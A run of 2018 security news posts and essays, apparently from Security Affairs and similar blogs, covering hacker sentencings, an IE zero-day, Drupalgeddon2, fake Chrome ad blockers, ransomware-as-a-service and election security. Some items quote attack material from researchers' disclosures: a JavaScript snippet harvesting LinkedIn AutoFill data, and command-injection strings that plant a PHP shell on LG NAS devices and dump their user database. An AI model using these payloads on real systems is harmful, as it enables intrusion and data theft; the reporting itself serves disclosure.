The hacker was suspected to be the founder of the hacker group  ‘Crackas With Attitude‘ that targeted the US officials between October 2015 and February 2016.

In October, the teenager has been released on conditional bail ahead of sentencing on December 15.

Kane Gamble was sentenced to two years in jail and will serve the sentence in a youth detention facility.

“This was an extremely nasty campaign of politically motivated cyber terrorism,” said judge Charles Haddon-Cave in the London criminal court.

“The victims would have felt seriously violated,” 

“It also seems he was able to successfully access Mr Brennan’s iCloud account,” prosecutor John Lloyd-Jone said earlier. 

Kane Gamble also gained access to the network of the US Department of Justice and was able to access court case files, including on the Deepwater oil spill.

Gamble’s advocate sustained that Gamble he is on the autism spectrum at the time of his offending had the mental development of a teenager.

According to the prosecutor, The teenager claimed he acted to support the Palestinian cause, and due to the United States “killing innocent civilians.”

Two other members of Crackas With Attitude team, Andrew Otto Boggs and Justin Gray Liverman, were arrested by FBI in September 2016 and had already been sentenced to five years in federal prison.

Crackas With Attitude

Pierluigi Paganini

(Security Affairs – Kane Gamble, hacking)

The post UK Teenager Kane Gamble who hacked CIA Chief and other US intel officials gets 2-year jail sentence appeared first on Security Affairs.

Exclusive – APT group exploited still unpatched zero-day in IE dubbed ‘double play’

Security researchers at the 360 Core Security observed an APT group exploiting a zero-day vulnerability in IE, dubbed ‘double play’. The flaw is still unfixed.

Security researchers at the 360 Core Security uncovered a zero-day vulnerability in IE, dubbed ‘double play’,  that was triggered by weaponized MS Office documents. The experts have been observing an APT group targeting a limited number of users exploiting the zero-day flaw.

At the time of writing the expert did not reveal the name of the APT because of ongoing investigation, most of the victims are located in ASIA.

According to the experts at 360 Core Security, users may get hacked by simply opening a malicious document. Hackers can use the ‘double play’ flaw to implant a backdoor Trojan and take full control over the vulnerable machine. 

Through source analysis, 360 Security experts were able to discover the attack chain and reported it to Microsoft.

The APT group was delivering an Office document with a malicious web page embedded, once the user opens the document, the exploit code and malicious payloads are downloaded and executed from a remote server. The later phase of this attack leverages a public UAC bypass technique and uses file steganography and memory reflection loading to avoid traffic monitoring and achieve loading with no files.

This ‘double play’ vulnerability may affect the latest versions of Internet Explorer and applications that are with IE kernel.

Experts at 360 Core Security are urgently promoting the release of the patch.

“At present, 360 is urgently promoting the release of the patch.” states 360 Core Security.

“We would like to remind users not to open any unfamiliar Office documents and use security software to protect against possible attacks.” states 360 Core Security.

double play zero day

 Below the timeline of the zero-day:

April 18. 360 Core Security detected the attack;
April 19. Experts reported the flaw to Microsoft.
April 20. Microsoft confirmed the existence of the zero-day. Microsoft hasn’t yet released t patch.

Pierluigi Paganini

(Security Affairs – double play zero-day, hacking)

The post Exclusive – APT group exploited still unpatched zero-day in IE dubbed ‘double play’ appeared first on Security Affairs.

iOS users can now use Google prompt on their devices via the Gmail app

Google announced that iOS users can now benefit from Google prompt feature via their Gmail application. Security and usability are crucial requirements for Google.

Google announced that iOS users can now receive Google prompts via their Gmail application.

“In 2017, we made Google prompt the primary choice for G Suite users turning on two-step verification for the first time. Back then, we noted that users with iOS devices would need to install the Google app in order to use the feature.” reads the blog post published by Google.

“Today, we’re making it possible for users with iOS devices to receive prompts via their Gmail app as well. This should encourage more people to use Google prompt, which is an easier and more secure method of authenticating an account,” 

Google prompt

Google prompt was designed to inform users of any attempt to log into their accounts and confirm it with a tap on their mobile devices.

Gmail users can approve sign-in requests via 2-Step Verification (2SV) by simply taping a “Yes” button on their smartphone since June 2016.

The 2-Step Verification process leverages login authentication code sent via SMS, once the user has received it, he will need to enter it on a sign in page.

The tech giant has launched the Google prompt to make this process simpler, it displays a popup message on the user’s mobile devices asking them to confirm the login with a single tap.

Google prompt was rolled out to both Android and iOS devices, but on iOS, the users need to have the Google Search app installed.

In October 2017,  Big G introduced Google prompt in the G Suite. The company implemented the feature to all of its users who choose to enable the extra layer of security, but in order to use it, iOS users need to have the Google app installed on the device.

Now Google has overwhelmed this limitation and iOS users can benefit from the Google prompt without having Google app installed.

iOS users who have both the Google app and Gmail app installed on their devices will receive the prompts from Gmail.

The availability of Google prompt in Gmail for iOS will be available to all users in a few days.

Pierluigi Paganini

(Security Affairs – Google prompt, iOS)

The post iOS users can now use Google prompt on their devices via the Gmail app appeared first on Security Affairs.

Securing Elections

Elections serve two purposes. The first, and obvious, purpose is to accurately choose the winner. But the second is equally important: to convince the loser. To the extent that an election system is not transparently and auditably accurate, it fails in that second purpose. Our election systems are failing, and we need to fix them.

Today, we conduct our elections on computers. Our registration lists are in computer databases. We vote on computerized voting machines. And our tabulation and reporting is done on computers. We do this for a lot of good reasons, but a side effect is that elections now have all the insecurities inherent in computers. The only way to reliably protect elections from both malice and accident is to use something that is not hackable or unreliable at scale; the best way to do that is to back up as much of the system as possible with paper.

Recently, there have been two graphic demonstrations of how bad our computerized voting system is. In 2007, the states of California and Ohio conducted audits of their electronic voting machines. Expert review teams found exploitable vulnerabilities in almost every component they examined. The researchers were able to undetectably alter vote tallies, erase audit logs, and load malware on to the systems. Some of their attacks could be implemented by a single individual with no greater access than a normal poll worker; others could be done remotely.

Last year, the Defcon hackers' conference sponsored a Voting Village. Organizers collected 25 pieces of voting equipment, including voting machines and electronic poll books. By the end of the weekend, conference attendees had found ways to compromise every piece of test equipment: to load malicious software, compromise vote tallies and audit logs, or cause equipment to fail.

It's important to understand that these were not well-funded nation-state attackers. These were not even academics who had been studying the problem for weeks. These were bored hackers, with no experience with voting machines, playing around between parties one weekend.

It shouldn't be any surprise that voting equipment, including voting machines, voter registration databases, and vote tabulation systems, are that hackable. They're computers -- often ancient computers running operating systems no longer supported by the manufacturers -- and they don't have any magical security technology that the rest of the industry isn't privy to. If anything, they're less secure than the computers we generally use, because their manufacturers hide any flaws behind the proprietary nature of their equipment.

We're not just worried about altering the vote. Sometimes causing widespread failures, or even just sowing mistrust in the system, is enough. And an election whose results are not trusted or believed is a failed election.

Voting systems have another requirement that makes security even harder to achieve: the requirement for a secret ballot. Because we have to securely separate the election-roll system that determines who can vote from the system that collects and tabulates the votes, we can't use the security systems available to banking and other high-value applications.

We can securely bank online, but can't securely vote online. If we could do away with anonymity -- if everyone could check that their vote was counted correctly -- then it would be easy to secure the vote. But that would lead to other problems. Before the US had the secret ballot, voter coercion and vote-buying were widespread.

We can't, so we need to accept that our voting systems are insecure. We need an election system that is resilient to the threats. And for many parts of the system, that means paper.

Let's start with the voter rolls. We know they've already been targeted. In 2016, someone changed the party affiliation of hundreds of voters before the Republican primary. That's just one possibility. A well-executed attack that deletes, for example, one in five voters at random -- or changes their addresses -- would cause chaos on election day.

Yes, we need to shore up the security of these systems. We need better computer, network, and database security for the various state voter organizations. We also need to better secure the voter registration websites, with better design and better internet security. We need better security for the companies that build and sell all this equipment.

Multiple, unchangeable backups are essential. A record of every addition, deletion, and change needs to be stored on a separate system, on write-only media like a DVD. Copies of that DVD, or -- even better -- a paper printout of the voter rolls, should be available at every polling place on election day. We need to be ready for anything.

Next, the voting machines themselves. Security researchers agree that the gold standard is a voter-verified paper ballot. The easiest (and cheapest) way to achieve this is through optical-scan voting. Voters mark paper ballots by hand; they are fed into a machine and counted automatically. That paper ballot is saved, and serves as a final true record in a recount in case of problems. Touch-screen machines that print a paper ballot to drop in a ballot box can also work for voters with disabilities, as long as the ballot can be easily read and verified by the voter.

Finally, the tabulation and reporting systems. Here again we need more security in the process, but we must always use those paper ballots as checks on the computers. A manual, post-election, risk-limiting audit varies the number of ballots examined according to the margin of victory. Conducting this audit after every election, before the results are certified, gives us confidence that the election outcome is correct, even if the voting machines and tabulation computers have been tampered with. Additionally, we need better coordination and communications when incidents occur.

It's vital to agree on these procedures and policies before an election. Before the fact, when anyone can win and no one knows whose votes might be changed, it's easy to agree on strong security. But after the vote, someone is the presumptive winner -- and then everything changes. Half of the country wants the result to stand, and half wants it reversed. At that point, it's too late to agree on anything.

The politicians running in the election shouldn't have to argue their challenges in court. Getting elections right is in the interest of all citizens. Many countries have independent election commissions that are charged with conducting elections and ensuring their security. We don't do that in the US.

Instead, we have representatives from each of our two parties in the room, keeping an eye on each other. That provided acceptable security against 20th-century threats, but is totally inadequate to secure our elections in the 21st century. And the belief that the diversity of voting systems in the US provides a measure of security is a dangerous myth, because few districts can be decisive and there are so few voting-machine vendors.

We can do better. In 2017, the Department of Homeland Security declared elections to be critical infrastructure, allowing the department to focus on securing them. On 23 March, Congress allocated $380m to states to upgrade election security.

These are good starts, but don't go nearly far enough. The constitution delegates elections to the states but allows Congress to "make or alter such Regulations". In 1845, Congress set a nationwide election day. Today, we need it to set uniform and strict election standards.

This essay originally appeared in the Guardian.

A flaw in LinkedIn feature allowed user data harvesting

The researcher Jack Cable (18) has discovered a vulnerability in LinkedIn, the AutoFill functionality, that allowed user data harvesting.

While experts and people are discussing the Cambridge Analytica case another disconcerting case made the headlines, the private intelligence agency LocalBlox has left unsecured online an AWS bucket containing 48 million records that were also harvested from Facebook, LinkedIn, and Twitter.

No doubt, data harvesting is a common practice and we are only discovering the tip of the iceberg, many companies and intelligence agencies do it for different reasons.

Sometimes this activity is advantaged by security flaws in the features implemented by the social media platforms.

Early April, Mark Zuckerberg admitted public data of its 2.2 billion users has been compromised over the course of several years by third-party actors that gathered information on its users. Third-party scrapers have exploited an issue in the Facebook’s search function that allows anyone to look up users via their email address or phone numbers.

Now the researcher Jack Cable (18) has discovered a flaw in LinkedIn, the AutoFill functionality, that allowed user data harvesting.

The AutoFill functionality allows to quickly fill out forms with data from their LinkedIn profile, including name, title, company, email address, phone number, city, zip code, state, and country.

Cable explained that it is possible to exploit the function to harvest user data by placing the AutoFill button on a malicious website, rather than leaving the LinkedIn button visible on the page the attacker could have changed its properties and locate it everywhere in the page making it invisible.

With this trick, that clearly violates LinkedIn’s privacy policies, when a user would visit the malicious site and click anywhere on the page, it unawares clicks on the invisible AutoFill button, resulting in his LinkedIn data being harvested.

“The potential for exploitation existed until being patched 04/19/18, as any whitelisted website can access this information with a single click.” wrote Cable.

“The exploit flowed as follows:

  1. The user visits the malicious site, which loads the LinkedIn AutoFill button iframe.
  2. The iframe is styled so it takes up the entire page and is invisible to the user.
  3. The user clicks anywhere on the page. LinkedIn interprets this as the AutoFill button being pressed, and sends the information via postMessage to the malicious site.
  4. The site harvests the user’s information via the following code:
window.addEventListener("message", receiveMessage, false);

function receiveMessage(event)
{
  if (event.origin == 'https://www.linkedin.com') {
    let data = JSON.parse(event.data).data;
    if (data.email) {
      alert('Hi, ' + data.firstname + ' ' + data.lastname + '! Your email is ' + data.email + '. You work at ' + data.company + ' and you live in ' + data.city + ', ' + data.state + '.');
      console.log(data);
    }
  }
  console.log(event)
}

Cable pointed out with this trick it is possible to access also non-public data was also provided to a site abusing AutoFill function, even if LinkedIn states in its documentation that only public data is provided to fill out forms.

Cable reported the flaw to LinkedIn on April 9 and the company temporary restricted the AutoFill functionality to whitelisted sites. Of course, the problem was not completely addressed in this way, an attacker that was able to compromise the whitelisted site was still in position to harvest data from LinkedIn.

On April 19, LinkedIn published a stable fix for the issue.

LinkedIn said it is not aware of there had been no evidence of malicious exploitation, but I’m sure that many of view has a different opinion.

Pierluigi Paganini

(Security Affairs – LinkedIn, data harvesting)

The post A flaw in LinkedIn feature allowed user data harvesting appeared first on Security Affairs.

At least 20 Million Chrome users have installed malicious Ad Blockers from Chrome store

A security researcher has discovered five malicious Ad Blockers extensions in the Google Chrome Store that had been installed by at least by 20 million users.

The security researcher Andrey Meshkov, co-founder of Adguard, has discovered five malicious Ad Blockers extensions in the Google Chrome Store that had been installed by at least by 20 million users.

The fake Ad blockers are

  • AdRemover for Google Chrome™ (10 million+ users)
  • uBlock Plus (8 million+ users)
  • [Fake] Adblock Pro (2 million+ users)
  • HD for YouTube™ (400,000+ users)
  • Webutation (30,000+ users)

The five extensions are clone versions of well-known Ad Blockers, searching for Ad Blockers in Google Chrome Store we can notice that crooks used popular keywords in the extension description in the attempt to display them in the top search results.

t’s been a while since different “authors” started spamming Chrome WebStore with lazy clones of popular ad blockers (with a few lines of their code on top of them).” wrote Meshkov.

“Just look at the search results. All the extensions I’ve highlighted are simple rip-offs with a few lines of code and some analytics code added by the “authors”. Instead of using tricky names they now spam keywords in the extension description trying to make to the top search results.”

malicious ad blockers

The analysis of the code of the Ad Blockers revealed that the developers just added a few lines of code and some analytics code to the code of the legitimate extension.

Meshkov reported his discovery to Google that immediately removed all from the Chrome Store.

The malicious code includes a modified version of jQuery library that hides the code to load the coupons.txt a strange image from a third-party domain http://www[.]hanstrackr[.]com.

The jQuery library includes a script that is able to send information about some websites visited by the users back to a remote server.

“This hidden script was listening to every request made by your browser and compared md5(url + “%Ujy%BNY0O”) with the list of signatures loaded from coupons.txt. When the said signature was hit, it loaded an iframe from the g.qyz.sx domain passing information about the visited page, and then re-initialized the extension.” continues the expert.

The expert noticed that the default image/script does nothing malicious, but it can be changed at any time to perform malicious activity. It is executed in the privileged context (extension’s background page), in this way it has full control of the browser.

The remote server sends commands to the malicious extension, which are executed in the extension ‘background page’ and can change your browser’s behavior in any way.

“Basically, this is a botnet composed of browsers infected with the fake Adblock extensions,” Meshkov added. “The browser will do whatever the command center server owner orders it to do.”

Meshkov has scanned other extensions on the Chrome WebStore and found four more extensions developed with a very same approach.

Be careful of what you install, install only necessary extensions from trusted developers and company.

Pierluigi Paganini

(Security Affairs – Ad Blockers, malware)

The post At least 20 Million Chrome users have installed malicious Ad Blockers from Chrome store appeared first on Security Affairs.

New Windows Defender Browser Protection Chrome extension aims to protect them from online threats.

Microsoft announced the new Windows Defender Browser Protection extension that aims to protect them from online threats.

Microsoft has a surprise for Chrome users in the Chrome Web Store, it’s the new Windows Defender Browser Protection extension that aims to protect them from online threats.

The new extension will help users in avoiding phishing emails, as well as, websites delivering malware.

links in phishing emails, as well as websites that trick users into downloading and installing malicious software.

“The Windows Defender Browser Protection extension helps protect you against online threats, such as links in phishing emails and websites designed to trick you into downloading and installing malicious software that can harm your computer. ” reads the description provided by Google on its store for the Windows Defender Browser Protection extension.

To protect Chrome users, Windows Defender Browser Protection checks the URL accessed against a list of malicious URLs, in the case it matches the list Windows Defender Browser Protection will show a red warning screen that informs users on the risks related to the malicious URL

The Chrome extension takes advantage of the same intelligence that powers Microsoft Edge’s protection capabilities, allowing users to add an extra layer of security when browsing online.

Windows Defender Google Chrome

Microsoft aims to reach the level of security implemented with the Edge browser, according to the NSS Labs 2017 Web Browser Security Comparative Report while Edge blocked 99 percent of phishing attempts, Chrome blocked 87 percent and 70 percent in Firefox.

The NSS Labs report also measured the level of protection for each browser against phishing attacks.

According to NSS Labs, the Edge browser could block 92.3% of phishing URLs and 99.5% of the Socially Engineered Malware (SEM) samples, while Chrome was able to block 74.5% of phishing URLs 87.5% of SEM samples.

Pierluigi Paganini

(Security Affairs – Windows Defender Browser Protection, Google Chrome)

The post New Windows Defender Browser Protection Chrome extension aims to protect them from online threats. appeared first on Security Affairs.

Rockwell Automation Allen-Bradley Stratix and ArmorStratix switches are exposed to hack due to Cisco IOS flaws

Rockwell Automation is warning that its Allen-Bradley Stratix and ArmorStratix industrial switches are exposed to hack due to security vulnerabilities in Cisco IOS.

According to Rockwell Automation, eight flaws recently discovered recently in Cisco IOS are affecting its products which are used in many sectors, including the critical manufacturing and energy.

The list of flaws includes improper input validation, resource management errors, 7PK errors, improper restriction of operations within the bounds of a memory buffer, use of externally-controlled format string.

“Successful exploitation of these vulnerabilities could result in loss of availability, confidentiality, and/or integrity caused by memory exhaustion, module restart, information corruption, and/or information exposure.” reads the security advisory published by the US ICS-CERT.

Affected models are Stratix 5400, 5410, 5700, 8000 and ArmorStratix 5700 switches running firmware version 15.2(6)E0a and earlier.

Rockwell Automation Stratix 5400

The most critical vulnerability is the Cisco CVE-2018-0171 Smart Install, a flaw that affects the Smart Install feature of Cisco IOS Software and Cisco IOS XE Software that could be exploited by an unauthenticated, remote attacker to cause a reload of a vulnerable device or to execute arbitrary code on an affected device.

A couple of weeks ago, the hacking crew “JHT” launched a hacking campaign exploiting Cisco CVE-2018-0171 flaw against network infrastructure in Russia and Iran.

Rockwell has released firmware version 15.2(6)E1 to address the vulnerabilities in its switches.

Rockwell Automation provided mitigations in addition to upgrading the software version:

Cisco has released new Snort Rules at https://www.cisco.com/web/software/286271056/117258/sf-rules-2018-03-29-new.html(link is external) to help address the following vulnerabilities:

  • CVE-2018-0171 – Snort Rule 46096 and 46097
  • CVE-2018-0156 – Snort Rule 41725
  • CVE-2018-0174 – Snort Rule 46120
  • CVE-2018-0172 – Snort Rule 46104
  • CVE-2018-0173 – Snort Rule 46119
  • CVE-2018-0158 – Snort Rule 46110

Pierluigi Paganini

(Security Affairs – Rockwell Automation, Cisco IOS law)

The post Rockwell Automation Allen-Bradley Stratix and ArmorStratix switches are exposed to hack due to Cisco IOS flaws appeared first on Security Affairs.

Perspectives on Russian hacking

Russia is an endlessly fascinating subject both in and around infosec. Recent years have shifted attention away from pure malware capabilities, to psyops, social engineering, and an endless slew of mind games designed to destabilize and keep nations ever-so-slightly off balance.

Security firms in some countries claim Russia would “win” in a so-called cyber war; elsewhere, whole nations seemingly throw up their hands and admit defeat, while…helpfully?…suggesting potential targets of interest. One hopes those are false flags diverting attention from the juicier strike points, but when even the Russian experts themselves seem to slip up in spectacular fashion, it seems anything is possible.

In fact, the US and UK have just released a joint statement which highlights Russian hacking (state-sponsored attacks) on network infrastructure devices over the last three years. With hack attacks bubbling under the surface, and endless concerns present about everything from referendum tampering to election interference, the subject has never been more prominent.

SCMagazine recently talked to a number of people working in security fields, myself included, on this very subject. While many areas of concern were raised, the main takeaways are as follows:

Bots and social media

The social media landscape has been irrevocably changed, in terms of what a nation state can potentially achieve with a troll/bot farm. “You’re a Russian bot” on Twitter has almost become the de-facto explanation for anyone you might happen to disagree with. Indeed, Russian shenanigans on said platform are so prolific that Twitter had to start sending out “So you dealt with a bot” style messages in January.

How many? Roughly 1.4 million notifications for anyone found to have interacted with the IRA (Internet Research Agency) during the 2016 US election. This includes:

  • People who directly engaged during the election period with the 3,814 IRA-linked accounts were identified, either by retweeting, quoting, replying to, mentioning, or liking those accounts or content created by those accounts
  • People who were actively following one of the identified IRA-linked accounts at the time those accounts were suspended
  • People who opt out of receiving most email updates from Twitter and would not have received our initial notice based on their email settings.

I never received a message myself, so either my Opsec game is on point or I spend too much time tweeting about chocolate.

There is an ongoing investigation into how many Russian bots dabbled in the UK’s EU referendum, also from the same year. Social media is an amazingly powerful platform for disinformation, and more often than not corrections either never take place or gain far fewer eyeballs than the original mistruth.

Who, what, when…you know what, just stop the attack

With the rise of APT attacks (“advanced persistent threats”), there has been huge focus on which nation state is doing what terrible and sneaky thing online. This is the case even when APTs typically turn out to be not very advanced at all—infected spreadsheet or basic phishing email, anyone?

All the same, being able to track down an attack and trace it back to country x is a huge headline grabber. The problem is that in many cases, the best you can do is make an informed guess.

Pin the tail on the nation state donkey was a big deal at one time; the focus is now slowly shifting to something people can actually do something about. Namely, not so much “who did this” but “how did they get in, and how can we stop it happening next time?” There’s no shame in being bested by an actual government with unlimited resources, and it’s definitely time to consider how we can make ourselves as unappealing a target as possible.

Holding you to ransom

Ransomware is one of the mainstays of Russian malware development, with numerous high profile attacks over the last few years. It’s interesting to wonder if the downturn in ransomware fortunes over the past year has had an impact on said development. It’s also interesting to wonder how much Russia may be contributing to the upturn in business-centric spyware recently.

Information may want to be free, but a little data exfiltration never hurt anybody (from a nation state’s perspective doing the exfiltration, at any rate). It’s a double whammy of locked up machines and harvested sensitive documents, and it’s all to play for.

Money makes the computer world go round

Governments around the world are now throwing big bucks at these issues. The UK previously dedicated £1.9 billion over five years to tackling the problem, and recently jumped into the world’s largest “cyber declaration”, a pact between up to 53 nations designed to help shore up defences globally. Expect to see tight bonds forged moving forward.

Whatever your approach, whatever your budget, whatever your defensive tactics, there’s never been a better time to consider if you’re doing all you can to try and dodge a digital attack from the highest level. Meanwhile, whether through organised malware attacks, high level subterfuge, or a relentless wave of social media botting, the digital monolith that is Russia continues to dance to nobody’s tune but its own.

The post Perspectives on Russian hacking appeared first on Malwarebytes Labs.

Hacking Cisco WebEx with a malicious Flash file. Patch it now!

Cisco issues a critical patch to address a remote code execution vulnerability in the Cisco WebEx software, hurry up apply it now!

Cisco has issued a critical patch to fix a serious vulnerability (CVE-2018-0112) in its WebEx software that could be exploited by remote attackers to execute arbitrary code on target machines via weaponized Flash files.

The vulnerability affects both client and server versions of WebEx Business Suite or WebEx Meetings. Cisco urges its users to update their software to fix the problem.

“A vulnerability in Cisco WebEx Business Suite clients, Cisco WebEx Meetings, and Cisco WebEx Meetings Server could allow an authenticated, remote attacker to execute arbitrary code on a targeted system.” reads the security advisory published by Cisco.

“The vulnerability is due to insufficient input validation by the Cisco WebEx clients. An attacker could exploit this vulnerability by providing meeting attendees with a malicious Flash (.swf) file via the file-sharing capabilities of the client. Exploitation of this vulnerability could allow arbitrary code execution on the system of a targeted user.”

The flaw has received a CVSS score of 9.0 and was rated as a ‘critical’ severity issue by Cisco.

cisco webex

The vulnerability was reported by the ENISA security expert Alexandros Zacharis of ENISA, it is due to insufficient input validation by the Cisco WebEx clients.

Zacharis discovered that an attacker could submit a malicious Flash file (.swf ) to a room full of attendees using the file sharing feature, then trigger the flaw to execute arbitrary code.

Cisco has already released software updates that fix the flaw, it confirmed that is not aware of any attacks exploiting the vulnerability in the wild.

Cisco added that currently there is no workaround to address the problem.

WebEx Business Suite software should be updated to the versions T32.10 and T31.23.2, while WebEx Meetings client software should be updated to T32.10 and Meetings Server should be updated to 2.8 MR2.

To determine whether a Cisco WebEx meeting application is running a flawed version of the WebEx client build, users can access their Cisco WebEx meeting site and go to the Support > Downloads section.

Pierluigi Paganini

(Security Affairs – Cisco WebEx, hacking)

The post Hacking Cisco WebEx with a malicious Flash file. Patch it now! appeared first on Security Affairs.

Experts are observing Drupalgeddon2 (CVE-2018-7600) attacks in the wild

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub experts started observing attackers using it to deliver backdoors and crypto miners.

At the end of March, the Drupal Security Team confirmed that a “highly critical” vulnerability (dubbed Drupalgeddon2), tracked as CVE-2018-7600, was affecting Drupal 7 and 8 core and announced the availability of security updates on March 28th.

The vulnerability was discovered by the Drupal developers Jasper Mattsson.

Both Drupal 8.3.x and 8.4.x are no more supported, but due to the severity of the flaw, the Drupal Security Team decided to address it with specific security updates and experts called it Drupalgeddon2.

Drupal development team released the security update in time to address CVE-2018-7600.

After the publication of a working Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes,” experts started observing bad actors attempting to exploit the flaw.

drupalgeddon2

A week after the release of the security update, the experts at security firm Check Point along with Drupal experts at Dofinity analyzed the CMS to analyzed the Drupalgeddon2 vulnerability and published a technical report on the flaw.

After the publication of the report. the expert Vitalii Rudnykh shared a working  Proof-Of-Concept for Drupalgeddon2 on GitHub for “educational or information purposes.”

Immediately after the disclosure of the PoC, security experts started observing bad actors attempting to exploit the flaw.

Over the weekend, several security firms observed threat actors have started exploiting the flaw to install malware on the vulnerable websites, mainly cryptocurrency miners.

The experts at the SANS Internet Storm Center reported several attacks delivering a cryptocurrency miner, a PHP backdoor, and an IRC bot written in Perl.

“Pretty much as soon as the exploit became publicly available, our honeypots started seeing attacks that used the exploit.” reads the analysis published by the SANS.
“Ever since then, we are seeing waves of exploit attempts hitting our honeypots.”

A thread on SANS ISC Infosec forums confirms that attackers are exploiting the Drupalgeddon2 flaw to install the XMRig Monero miner. Attackers also use to drop and execute other payloads, including a script to kill competing miners on the infected system.

According to the analysis published by experts at security firm Volexity, threat actors are exploiting the Drupalgeddon2 flaw to deliver malicious scripts cryptocurrency miners and backdoors.

The experts associated one of the observed campaigns aimed to deliver XMRig with a cybercriminal gang that exploited the vulnerability (CVE-2017-10271) in Oracle WebLogic servers to deliver cryptocurrency miners in late 2017.

According to security experts at Imperva, 90% of the Drupalgeddon2 attacks are scanning activities, 3% are backdoor infection attempts, and 2% are attempting to run drop cryptocurrency miners on the vulnerable systems.

“To this point, we have seen 90% of the attack attempts are scanners, 3% are backdoor infection attempts, and 2% are attempts to run crypto miners on the targets.” states the analysis published Imperva.

“Also, most of the attacks originated from the US (53%) and China (45%) “

drupalgeddon2

While experts speculate that the number of attacks could continue to increase in the next weeks, site admins must update their CMS to Drupal 7.58 or Drupal 8.5.1.

Pierluigi Paganini

(Security Affairs – Drupal, Drupalgeddon2)

The post Experts are observing Drupalgeddon2 (CVE-2018-7600) attacks in the wild appeared first on Security Affairs.

ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS

Security experts at CSE CybSec ZLab malware Lab have conducted an interesting analysis of the principal Ransomware-as-a-Service platforms available on the dark web.

Over the years, the diffusion of darknets has created new illegal business models. Along with classic illegal goods such as drugs and payment card data, other services appeared in the criminal underground, including hacking services and malware development. New platforms allow crooks without any technical skills to create their own ransomware and spread it.

Ransomware is malicious code that infects the victims’ machines and blocks or encrypts their files, requesting the payment of a ransom. When ransomware is installed on a victim machine, it searches for and targets sensitive files and data, including financial data, databases and personal files. Ransomware is developed to make the victim’ machine unusable. The user has only two options: pay the ransom without having the guarantee of getting back the original files or format the PC disconnecting it from the Internet.

 

The rise of the RaaS business model is giving wannabe criminals an effortless way to launch a cyber-extortion campaign without having technical expertise, and it is the cause of flooding the market with new ransomware strains.

Ransomware-as-a-Service is a profitable model for both malware sellers and their customers. Malware sellers, using this approach, can acquire new infection vectors and could potentially reach new victims that they are not able to reach through a conventional approach, such as email spamming or compromised website. RaaS customers can easily obtain ransomware via Ransomware-as-a-Service portals, just by configuring a few features and distributing the malware to unwitting victims.

ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS

Naturally, RaaS platforms cannot be found on the Clearnet, so they are hidden into the dark side of the Internet, the Dark Web.

Surfing the dark web through unconventional search engines, you can find several websites that offer RaaS. Each one provides different features for their ransomware allowing users to select the file extensions considered by the encrypting phase; the ransom demanded to the victim and other technical functionality that the malware will implement.

Furthermore, beyond the usage of Ransomware-as-a-Service platforms, the purchase of custom malicious software can be made through crime forums or websites where one can hire a hacker for the creation of one’s personal malware. Historically, this commerce has always existed, but it was specialized into cyber-attacks, such as espionage, hack of accounts and website defacement. Only when hackers understood it could be profitable, they started to provide this specific service.

Security experts at CSE CybSec ZLab malware Lab have conducted an interesting analysis of the principal Ransomware-as-a-Service platforms available on the dark web, including

  • RaaSberry
  • Ranion
  • EarthRansomware
  • Redfox ransomware
  • Createyourownransomware
  • Datakeeper

Technical details of the above services are reported in the report titled:

ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS

Enjoy it!

Pierluigi Paganini

(Security Affairs – Ransomware-as-a-Service, malware)

The post ZLAB MALWARE ANALYSIS REPORT: RANSOMWARE-AS-A-SERVICE PLATFORMS appeared first on Security Affairs.

A flaw could allow easy hack of LG Network-attached storage devices

Network-attached storage devices manufactured by LG Electronics are affected by a critical remote code execution vulnerability that could be exploited by attackers to gain full control of the devices.

The experts at the security firm VPN Mentor found a pre-auth remote command injection vulnerability that affects the majority of LG NAS device models.

“we found a way to hack into the system using a pre-authenticated remote command injection vulnerability, which can then allow us to do virtually everything including access the data and tamper with the user data and content.” states the blog post published by VPN Mentor.

“The vulnerability is a pre-auth remote command injection vulnerability found in the majority of LG NAS devices.”

LG Network-attached storage

The flaw ties the improper validation of the “password” parameter of the user login page for remote management, this means that a remote attacker can pass arbitrary system commands through this field.

“As we show in the video, you cannot simply log in with any random username and password. However, there lies a command injection vulnerability in the “password” parameter (you have to use an interceptor like burp). We can simply trigger this bug by adding to it.” continues the analysis.

“To add a new user, we can simply write a persistent shell called c.php by using:

;echo “” > /tmp/x2;sudo mv /tmp/x2 /var/www/c.php

Entering it as a password exploits the vulnerability.

Then, by passing the following command, we can “dump” the users:

echo “.dump user” | sqlite3 /etc/nas/db/share.db"

The experts explained that it is quite simple to dump all database data and add a new user. The experts noticed that LG uses the MD5 hash algorithm to protect passwords, this means that they can be easily cracked.

Below a video PoC of the hack that shows how to exploit the vulnerability to establish a shell on the vulnerable Network-attached storage device and use it to execute commands.

LG has not yet released a security update to address the flaw, for this reason, if you are using LG NAS devices do not expose them on the Internet and protect them with a  firewall that will allow only connection from authorized IPs.

Users are also recommended to periodically look out for any suspicious activity by checking all registered usernames and passwords on their devices.

Let me suggest also to periodically check all registered users to detect any anomaly.

A few weeks ago, experts at VPN Mentor disclosed several issued in popular VPN services.

Pierluigi Paganini

(Security Affairs – LG Network-attached storage, hacking)

The post A flaw could allow easy hack of LG Network-attached storage devices appeared first on Security Affairs.

Microsoft, Facebook and other tech giants join forces on cybersecurity

In light of increased and more sophisticated threats in the cybersecurity landscape, tech giants have vowed to get more serious about protecting their customers by working together through a new Cybersecurity Tech Accord. Thirty-four companies—including Microsoft, Oracle, HP, Facebook, Cisco, Nokia TrendMicro and others—have signed on to the...

Read the whole entry... »

Related Stories

UK NCSC, DHS and the FBI Warn of Russian hacking campaign on Western networks

UK NCSC, DHS, and the FBI warn of Russian hacking campaign on Western networks, state-sponsored hackers are targeting network infrastructure key components.

US and Britain government agencies warn of Russian state-sponsored cyber attacks to compromise government and business networking equipment. Russian hackers aim to control the data flaw “to support espionage, extract intellectual property, maintain persistent access to victim networks and potentially lay a foundation for future offensive operations,”

The operation was “to support espionage, extract intellectual property, maintain persistent access to victim networks and potentially lay a foundation for future offensive operations,” Washington and London said in a joint statement.

“Russian state-sponsored actors are using compromised routers to conduct spoofing ‘man-in-the-middle’ attacks to support espionage, extract intellectual property, maintain persistent access to victim networks and potentially lay a foundation for future offensive operations,” reads a joint statement issued by UK and US Goverments.

“Whoever controls the routing infrastructure of a network essentially controls the data flowing through the network.”

According to the US DHS, the campaign is part of well known Grizzly Steppe.

